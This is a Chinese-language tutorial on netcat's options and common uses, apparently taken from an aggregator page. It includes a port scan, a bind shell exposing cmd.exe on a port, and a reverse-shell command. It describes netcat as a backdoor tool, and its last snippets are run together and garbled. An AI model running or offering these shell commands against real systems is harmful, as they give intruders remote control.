netcat被譽為網路安全界的』瑞士軍刀』,相信沒有什麼人不認識它吧……乙個簡單而有用的工具,透過使用tcp或udp協議的網路連線去讀寫資料。它被設計成乙個穩定的後門工具,能夠直接由其它程式和指令碼輕鬆驅動。同時,它也是乙個功能強大的網路除錯和探測工具,能夠建立你需要的幾乎所有型別的網路連線,還有幾個很有意思的內建功能
引數介紹:'nc.exe -h' 即可看到各引數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] …nc -l -p port [options] [hostname] [port]
-d 後台模式
-e prog 程式重定向,一旦連線,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12
, …-h 幫助資訊
-i secs 延時的間隔
-l 監聽模式,用於入站連線
-l 連線關閉後,仍然繼續監聽
-n 指定數字的ip位址,不能用hostname
-o file 記錄16進製制的傳輸
-p port 本地埠號
-r 隨機本地及遠端埠
-s addr 本地源位址
-t 使用telnet互動方式
-u udp模式
-v 詳細輸出–用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉–用於掃瞄時
埠的表示方法可寫為m-n的範圍格式。
基本用法:
大概有以下幾種用法:
(1) 連線到remote主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的tcp80埠
(2) 監聽local主機,例子:
格式:nc -l -p 80
講解:監聽本機的tcp80埠
(3) 掃瞄遠端主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃瞄192.168.x.x的tcp80到tcp445的所有埠
(4) remote主機繫結shell,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
講解:繫結remote主機的cmdshell在remote主機的tcp5354埠
(5) remote主機繫結shell並反向連線,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
講解:繫結remote主機的cmdshell並反向連線到192.168.x.x的tcp5354埠
以上為最基本的幾種用法(其實nc的用法還有很多,
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大……)。
nc 使用例項
nc.exe h即可看到各引數的使用方法。基本格式 nc options hostname port s ports nc l p port options hostname port d 後台模式 e prog 程式重定向,一旦連線,就執行 危險 g gateway source routing ...
Linux下nc的使用
今天在飲水思源上閒逛,看到了乙個貼子關於linux下nc命來實現檔案傳輸,進行學習了解了一下。傳送端 cat test.txt nc l p 6666 或者nc l p 6666 test.txt 監聽6666埠,等待連線 設傳送端ip為10.20.133.152 接收端 nc 10.20.133....
linux下nc的使用
今天在飲水思源上閒逛,看到了乙個貼子關於linux 下nc命來實現檔案傳輸,進行學習 了解了一下。傳送端 cattest txt nc l p 6666 或者nc l p 6666 test.txt nc u v z w2 10.20.133.152 1 14000 可以掃瞄10.20.133.15...